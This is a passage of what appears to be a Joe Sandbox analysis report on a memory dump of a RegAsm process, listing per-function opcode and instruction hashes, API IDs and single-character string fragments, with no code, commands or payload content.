                                    • Instruction ID: 8a51dd8e2965cc9f0c4013a2f6a7698077ed2e8ce9dcff126952d1e9ceec8530
                                    • Opcode Fuzzy Hash: 98cb35be4dcf6147bb54d841e08aa9a7e406920ae8f199def00657b733b42f8a
                                    • Instruction Fuzzy Hash: EFB15579904301AFDB108F25DC41B5ABBE2BFD8314F144A3EF898932A1D776DD668B06
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                    • Instruction ID: a24f2a78553098ad8a5e3b5bc8abd089333314a4ae9ebed43d08ec28266042c4
                                    • Opcode Fuzzy Hash: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                    • Instruction Fuzzy Hash: 9D9126B1B04321ABD7209F20DD91B77B3A5EF91318F14482DE9869B381E7B9E904C75A
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
                                    • Instruction ID: 3187122ed07642cbe4dcf9e03264eeaa439871456ea8a6719abbd84e200541cd
                                    • Opcode Fuzzy Hash: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
                                    • Instruction Fuzzy Hash: 4EA11436A043018BC718DF28D99092BB3F2EBC9710F1A957DE9869B365EB35DC05CB46
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                    • Instruction ID: afe5d4654f5e8657962bc42cc500043a3620e9a043509faccf93fb76782c58a6
                                    • Opcode Fuzzy Hash: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                    • Instruction Fuzzy Hash: DBC15BB29087418FC360CF28DC96BABB7F1BF85318F09492DD1DAD6242E778A155CB46
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eca7b8087cccba19e5979cf0e8330dd1936bd6a3fecaafeec36cf51b3ab145d2
                                    • Instruction ID: 652f8e9b795bdad566c10a3835dfc4d237c9f110778e3a4e594c84154d78986c
                                    • Opcode Fuzzy Hash: eca7b8087cccba19e5979cf0e8330dd1936bd6a3fecaafeec36cf51b3ab145d2
                                    • Instruction Fuzzy Hash: 43914C72754B1A4BC714DE6CDC9066EB6D2ABD4210F4D423CD8958B3C2EF78AD0587C5
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
                                    • Instruction ID: 89cd8c3f6ac805753dcfa7ea52abb159a623b373aaffce4ab273b97bd3830c78
                                    • Opcode Fuzzy Hash: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
                                    • Instruction Fuzzy Hash: CFB10575608790DFD714DF24E891A2BB7E2EF8A314F488A6DF0D5872A2D7388905CB16
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
                                    • Instruction ID: cf6a0fb400f3c0121e69896af41eb3d2a2b4280c5d577effd33442f2baf9bc8c
                                    • Opcode Fuzzy Hash: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
                                    • Instruction Fuzzy Hash: CB81AE326053019BC7249F29C85067FB3A2FFC8710F2AD42DE9868B395EB349C52D785
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
                                    • Instruction ID: ba880319810bdb8e213e259538359e713a98a4b2945b2457ae3d4c78796ecc2a
                                    • Opcode Fuzzy Hash: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
                                    • Instruction Fuzzy Hash: 47512A357043008FE7188F28C89577BB7E2EB9A320F18A62ED5D597392D7389C41C78A
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a5610294b30e5e8a679adaf8088138694fc7c481e66a98cc5ba01ae8c02aa6d
                                    • Instruction ID: c8e85d340764d3b4d6a043baf240a448254d236dbbdea7acc366692660b189d4
                                    • Opcode Fuzzy Hash: 2a5610294b30e5e8a679adaf8088138694fc7c481e66a98cc5ba01ae8c02aa6d
                                    • Instruction Fuzzy Hash: C87129B2A042614FC7158E28D84139FBBD1BB95324F18863EE8B9873D2D779C84AD7C1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 29143899424894e7b8e427b1e6e1f66170dacedfe65da3d43b0f1d8a79b00b20
                                    • Instruction ID: 4c2c0ab1878e9cfa13c7d80eb19278cb3d77386feaf759a830bf0c171a5c4840
                                    • Opcode Fuzzy Hash: 29143899424894e7b8e427b1e6e1f66170dacedfe65da3d43b0f1d8a79b00b20
                                    • Instruction Fuzzy Hash: 3C613B3A7496C047D3288E3D4C112AABA934BD7230F2CC77EEDF6873E1D56988469355
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
                                    • Instruction ID: 19c9bc1ea9186e56c23c5e66cc144f5345884b6a785bfb5c303e44cb60fc86fa
                                    • Opcode Fuzzy Hash: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
                                    • Instruction Fuzzy Hash: 915126746083009BE7109F29DC45B2BB7E6EB89704F14982DF5C597292DB39DC05CBAB
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0288cd3b192f347070e81ea7353e08bb5565fcf5553c08da131d7bc18d8c1a13
                                    • Instruction ID: 583c87d3fd9d435e842b0babbfef0573c90b7f3422fd301491a952917507ab78
                                    • Opcode Fuzzy Hash: 0288cd3b192f347070e81ea7353e08bb5565fcf5553c08da131d7bc18d8c1a13
                                    • Instruction Fuzzy Hash: 2E516DB15087549FE314DF29D49435BBBE1BBC8318F044E2EE4E987390E379DA088B96
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
                                    • Instruction ID: 6e37d88637f30dcf1ca5a39760ca9fc235c391d288c19f204446c63a880f3ae7
                                    • Opcode Fuzzy Hash: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
                                    • Instruction Fuzzy Hash: 0951AE30B483648FD710DA28A480267BBD2DF95320F8A867ED4D44B3D6E67DD90DD389
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d04a0d8e38c3f294c211cbf0a89a7ee30207864e8a9f5169d07d9085582a6937
                                    • Instruction ID: 1e023c5d0ae8bc499a1476ddf9e588c272e9bef8a9d0e355e0d1dc09bced5273
                                    • Opcode Fuzzy Hash: d04a0d8e38c3f294c211cbf0a89a7ee30207864e8a9f5169d07d9085582a6937
                                    • Instruction Fuzzy Hash: 03615C31D046A18FDB14CF28C85039DBBF1AB4E310F1AC6AAC859AB391C7799C45DF85
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 80a270cec9775b927bc727ae391425bd2de1f56668aa53b1f5ee410799ab9563
                                    • Instruction ID: d4e59386902d7f076a599dd24da1785c797e999f3f2e44946b1e4a57c50fb419
                                    • Opcode Fuzzy Hash: 80a270cec9775b927bc727ae391425bd2de1f56668aa53b1f5ee410799ab9563
                                    • Instruction Fuzzy Hash: 13319B33BA87504BD304DB628C886ABE586AFD1764F0D466DE8D4773D2C9B49C0183DD
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 70a5542dbed4291c7f0e4c69363a5fae7bd86cdcdd8d89fd126e446a51f24cc8
                                    • Instruction ID: f52b03c38bbf71025152a8b77a79184c4a140196803d3bef29f19ac7e076952c
                                    • Opcode Fuzzy Hash: 70a5542dbed4291c7f0e4c69363a5fae7bd86cdcdd8d89fd126e446a51f24cc8
                                    • Instruction Fuzzy Hash: 2241D2B1E102285FDB24CF788C5279EBAB6EB95300F1181BDD849EB285E7340D468F92
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6719c340687af9c7671d69fd13b02110751ddfc4bfd7c22202d719cfaa6f9092
                                    • Instruction ID: f5f621b67306c00f1b1f1892e0c4b111cdc11732c84e43f9357b9df5953cc386
                                    • Opcode Fuzzy Hash: 6719c340687af9c7671d69fd13b02110751ddfc4bfd7c22202d719cfaa6f9092
                                    • Instruction Fuzzy Hash: 3E7160B840AB848FE774DF04D45868ABBE0FB8A358F52991ED48C47311C7B92448CF9B
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3ac257c9c1b75187117c336eb7496787fabe20a4f9f742b947e5c359f3d43b3c
                                    • Instruction ID: 24e83879a734b152f463eb7ca99c156da8292c87067313e83d08c5c08021f5dd
                                    • Opcode Fuzzy Hash: 3ac257c9c1b75187117c336eb7496787fabe20a4f9f742b947e5c359f3d43b3c
                                    • Instruction Fuzzy Hash: 6421F831E083500BD718CF39989116BFBD29BDF224F18D53DD4A697395CA38ED068A49
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bd0ee31e4d4d6d9ac2fa2587f77cf37721911ca3e59ccc36e7bfb755614f87b6
                                    • Instruction ID: 2e66319cfaede8187dee7502eb2bdf6532bbee011b37898b3e62ff9ec94ea10c
                                    • Opcode Fuzzy Hash: bd0ee31e4d4d6d9ac2fa2587f77cf37721911ca3e59ccc36e7bfb755614f87b6
                                    • Instruction Fuzzy Hash: 2C1166324092905AC314CB289940737BBE19B87310F584A5DF4D6E32E1D728CC028B8A
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                    • Instruction ID: 1bdb52c757136d0f491bb15e4131204bafb517a34a554dccf387603b88e59a22
                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                    • Instruction Fuzzy Hash: 4D11EC336055D40EC3198D3C84006657FD31AB7235F6953DAF4B89B2D3D5268DCA8359
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
                                    • Instruction ID: 3de76f9d274b52e90d2ef9e87ec8d3366dafd7d2e10265ff4f1f4711345407d1
                                    • Opcode Fuzzy Hash: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
                                    • Instruction Fuzzy Hash: 7601B1F570171147D720AE51A9C0B27B2B86FC0748F19443EEC4457342DB7DEC29869E
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
                                    • Instruction ID: 34e981112378c59cf45707eac27e4188cbaca79d234523b47ecff1cb0040ee73
                                    • Opcode Fuzzy Hash: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
                                    • Instruction Fuzzy Hash: 59016DB9C00624EFEF00AF55DC01B9E77B6AB0A324F0414A5E508BB392D731ED10CB95
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
                                    • Instruction ID: 76115147780e5b0d0309e2a0309811062aead7e9691d40ac881d7231c88a4ab0
                                    • Opcode Fuzzy Hash: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
                                    • Instruction Fuzzy Hash: 23E0D8FFD556600397548A235C02226B1936BDA628B1AB8788E9673707EA359C0741D8
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
                                    • Instruction ID: 8488e0a8640df04fcf481087a0a0e2354c4894f8e99b76394d31cfc5082ce78b
                                    • Opcode Fuzzy Hash: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
                                    • Instruction Fuzzy Hash: 6BE01279C11100BFDE046B11FC0161CBA72B76630BF46213AE40873232EF35A436A75D
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
                                    • Instruction ID: 6e3621e5ba52bd1720ea54ad2d17b774c7841a8325dce5c8bd5a6b1d086829a3
                                    • Opcode Fuzzy Hash: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
                                    • Instruction Fuzzy Hash: 36D0C279815910CBDB047F01EC0216A73F4AB03389F04007CE88123263DB39D8288E8E
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                    • Instruction ID: f6de81edf4edbd36f0565e031b671f89904ab193cb181933f1b50bd017efe36b
                                    • Opcode Fuzzy Hash: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                    • Instruction Fuzzy Hash: C9D0127BF9210047DA099F11DD43775666393C770870DE1398805E3348DE3CD41A840E
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                    • Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
                                    • Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                    • Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                    • Instruction ID: 02d06448f02dd76ad61b8ab648816bdf30096f71157e536fee4757e064133957
                                    • Opcode Fuzzy Hash: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                    • Instruction Fuzzy Hash: AEA022F8C0A800C3E800CF20BC02030F23C830B2A8F00303AE00CF3203EA30E0088A0E
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: AllocString
                                    • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                    • API String ID: 2525500382-534244583
                                    • Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                    • Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
                                    • Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                    • Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: AllocString
                                    • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                    • API String ID: 2525500382-534244583
                                    • Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                    • Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
                                    • Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                    • Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit
                                    • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                    • API String ID: 2610073882-1095711290
                                    • Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                    • Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
                                    • Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                    • Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit
                                    • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                    • API String ID: 2610073882-1095711290
                                    • Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                    • Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
                                    • Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                    • Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitVariant
                                    • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                    • API String ID: 1927566239-3011065302
                                    • Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                    • Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
                                    • Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                    • Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitVariant
                                    • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                    • API String ID: 1927566239-3011065302
                                    • Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                    • Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
                                    • Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                    • Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit
                                    • String ID: A$e$e$n$p$p$v$w$z$z
                                    • API String ID: 2610073882-1114116150
                                    • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                    • Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
                                    • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                    • Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763